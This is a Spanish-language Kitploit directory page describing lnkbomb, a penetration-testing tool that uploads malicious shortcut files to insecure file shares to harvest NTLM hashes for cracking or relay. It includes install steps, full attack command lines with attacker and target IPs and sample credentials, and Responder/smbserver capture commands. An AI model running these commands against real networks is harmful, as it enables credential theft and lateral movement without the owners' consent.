Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
lnkbomb — Generador de accesos directos maliciosos para recopilar hashes NTLM de recursos compartidos de archivos inseguros. | Kitploit
Herramientas/GitHubGitHub/dievus/lnkbomb
Ataques de ContraseñasExplotaciónMovimiento LateralRecopilación de InformaciónPruebas de PenetraciónRed TeamingArchived
GitHubdievus/lnkbomb

lnkbomb

Generador de accesos directos maliciosos para recopilar hashes NTLM de recursos compartidos de archivos inseguros.

Ver Repositorio
363627hace 1 añoRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Lnkbomb

ko-fi

Lnkbomb se utiliza para subir archivos de acceso directo maliciosos a recursos compartidos inseguros. La vulnerabilidad existe debido a que Windows busca un archivo de icono para asociar con el archivo de acceso directo. Este archivo de icono puede dirigirse a la máquina del probador de penetración que ejecuta Responder o smbserver para recolectar hashes NTLMv1 o NTLMv2 (dependiendo de la configuración de la máquina víctima). El probador puede luego intentar descifrar esos hashes recolectados sin conexión con una herramienta como Hashcat, o retransmitirlos a una herramienta como ntlmrelayx para una mayor explotación.

El archivo de payload se sube directamente al recurso compartido inseguro especificado por el probador en la línea de comandos. El probador también incluye su dirección IP, que se escribe en el payload.

La versión 2.0 es una reconstrucción total de la herramienta y utiliza la biblioteca pysmb, permitiendo la entrega de payloads sin autenticar y autenticados.

Uso en Python

Instalando Lnkbomb

Tenga en cuenta que el proyecto funciona de manera consistente en Windows. Puede tener problemas en Linux.

git clone https://github.com/dievus/lnkbomb.git

Cambie al directorio lnkbomb y ejecute:

python3 lnkbomb.py -h

Esto mostrará el menú de ayuda, que contiene las siguientes banderas:

-h, --help - Lista las opciones de ayuda

-t, --target - Especifica la dirección IP del objetivo

-a, --attacker - Especifica la dirección IP de la máquina de ataque del probador

-r, --recover - Se usa para eliminar el payload cuando las pruebas están completas (ej. -r payloadname.url)

-w, --windows - Nuevo comando - requerido para configurar los puertos apropiados para recursos compartidos Windows

-l, --linux - Nuevo comando - requerido para configurar los puertos apropiados para recursos compartidos Linux

-n, --netbios - Nuevo comando - el nombre NetBIOS para máquinas Windows objetivo debe ser incluido

Ejemplos de comandos completos incluyen:

python3 .\lnkbomb.py -t 192.168.1.79 -a 192.168.1.21 -s Shared -u themayor -p Password123! -n dc01 --windows

python3 .\lnkbomb.py -t 192.168.1.79 -a 192.168.1.21 -s Shared -u themayor -p Password123! -n dc01 --windows -r dicnwdsebl.url

Necesitará utilizar una herramienta como Responder o smbserver para capturar el hash NTLM.
responder -I eth0 -dwFP -v

o

smbserver.py . . -smb2support

Notas

Tenga en cuenta que esta herramienta está diseñada únicamente para fines de hacking ético y pruebas de penetración. No apruebo ningún comportamiento que incluya probar objetivos para los cuales no tenga permiso actualmente.

Esta herramienta puede o no funcionar dependiendo de los parches y versiones del objetivo. La experiencia del usuario puede variar.

Sé que son accesos directos .url y no extensiones .lnk. Lo hago para provocarte.

Descargar herramienta